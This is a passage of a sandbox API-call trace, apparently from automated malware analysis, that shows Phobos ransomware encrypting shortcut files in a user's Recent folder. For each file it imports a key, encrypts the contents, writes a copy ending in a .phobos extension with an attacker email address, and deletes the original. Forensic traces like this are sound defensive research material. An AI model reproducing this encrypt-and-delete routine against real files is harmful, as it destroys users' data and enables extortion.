hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0200.175] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.175] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.175] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.175] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.175] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.175] CloseHandle (hObject=0x100) returned 1 [0200.175] CloseHandle (hObject=0xfc) returned 1 [0200.175] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\aYcpxr-H-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\aycpxr-h-.lnk")) returned 1 [0200.176] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b-Hp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b-hp.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.256] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=976) returned 1 [0200.256] CloseHandle (hObject=0x160) returned 1 [0200.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b-Hp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b-hp.lnk")) returned 0x20 [0200.256] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b-Hp.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b-hp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b-Hp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b-hp.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.256] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.256] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b-Hp.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b-hp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.257] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.257] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.257] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3d0, lpOverlapped=0x0) returned 1 [0200.258] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e0, dwBufLen=0x3e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3e0) returned 1 [0200.258] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3e0, lpOverlapped=0x0) returned 1 [0200.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.259] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.259] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.259] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.259] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.259] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.259] CloseHandle (hObject=0x160) returned 1 [0200.259] CloseHandle (hObject=0xac) returned 1 [0200.260] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b-Hp.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b-hp.lnk")) returned 1 [0200.260] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B5LfJ GwrrR6bKw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b5lfj gwrrr6bkw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.261] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2659) returned 1 [0200.262] CloseHandle (hObject=0xac) returned 1 [0200.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B5LfJ GwrrR6bKw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b5lfj gwrrr6bkw.lnk")) returned 0x20 [0200.262] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B5LfJ GwrrR6bKw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b5lfj gwrrr6bkw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B5LfJ GwrrR6bKw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b5lfj gwrrr6bkw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.262] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.262] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B5LfJ GwrrR6bKw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b5lfj gwrrr6bkw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.263] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.263] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa63, lpOverlapped=0x0) returned 1 [0200.264] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa70, dwBufLen=0xa70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa70) returned 1 [0200.264] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa70, lpOverlapped=0x0) returned 1 [0200.265] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.265] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.265] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.265] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.265] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.265] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.265] CloseHandle (hObject=0xac) returned 1 [0200.265] CloseHandle (hObject=0x160) returned 1 [0200.265] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B5LfJ GwrrR6bKw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b5lfj gwrrr6bkw.lnk")) returned 1 [0200.266] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B6_2-Vnlq39Px6c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b6_2-vnlq39px6c.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.267] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2670) returned 1 [0200.267] CloseHandle (hObject=0x160) returned 1 [0200.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B6_2-Vnlq39Px6c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b6_2-vnlq39px6c.lnk")) returned 0x20 [0200.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B6_2-Vnlq39Px6c.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b6_2-vnlq39px6c.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B6_2-Vnlq39Px6c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b6_2-vnlq39px6c.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.268] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.268] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B6_2-Vnlq39Px6c.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b6_2-vnlq39px6c.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.269] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.269] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.269] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa6e, lpOverlapped=0x0) returned 1 [0200.270] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa70, dwBufLen=0xa70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa70) returned 1 [0200.270] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa70, lpOverlapped=0x0) returned 1 [0200.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.271] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.271] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0200.271] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.271] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0200.271] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.271] CloseHandle (hObject=0x160) returned 1 [0200.271] CloseHandle (hObject=0xac) returned 1 [0200.271] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\B6_2-Vnlq39Px6c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b6_2-vnlq39px6c.lnk")) returned 1 [0200.272] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BjX2-p.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bjx2-p.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.273] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2539) returned 1 [0200.273] CloseHandle (hObject=0xac) returned 1 [0200.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BjX2-p.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bjx2-p.lnk")) returned 0x20 [0200.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BjX2-p.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bjx2-p.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BjX2-p.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bjx2-p.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.274] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.274] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BjX2-p.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bjx2-p.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.274] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.274] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.274] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x9eb, lpOverlapped=0x0) returned 1 [0200.276] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9f0, dwBufLen=0x9f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x9f0) returned 1 [0200.276] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x9f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x9f0, lpOverlapped=0x0) returned 1 [0200.277] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.277] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.277] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0200.277] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.277] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0200.277] CryptDestroyKey (hKey=0xa32868) returned 1 [0200.277] CloseHandle (hObject=0xac) returned 1 [0200.277] CloseHandle (hObject=0x160) returned 1 [0200.277] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BjX2-p.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bjx2-p.lnk")) returned 1 [0200.278] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0200.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cE4b_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ce4b_.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.279] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2363) returned 1 [0200.279] CloseHandle (hObject=0x160) returned 1 [0200.279] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cE4b_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ce4b_.lnk")) returned 0x20 [0200.279] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cE4b_.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ce4b_.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cE4b_.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ce4b_.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.279] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.279] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0200.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cE4b_.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ce4b_.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0200.280] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32868) returned 1 [0200.280] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0200.280] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x93b, lpOverlapped=0x0) returned 1 [0200.282] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x940, dwBufLen=0x940 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x940) returned 1 [0200.282] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x940, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x940, lpOverlapped=0x0) returned 1 [0200.283] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0200.283] 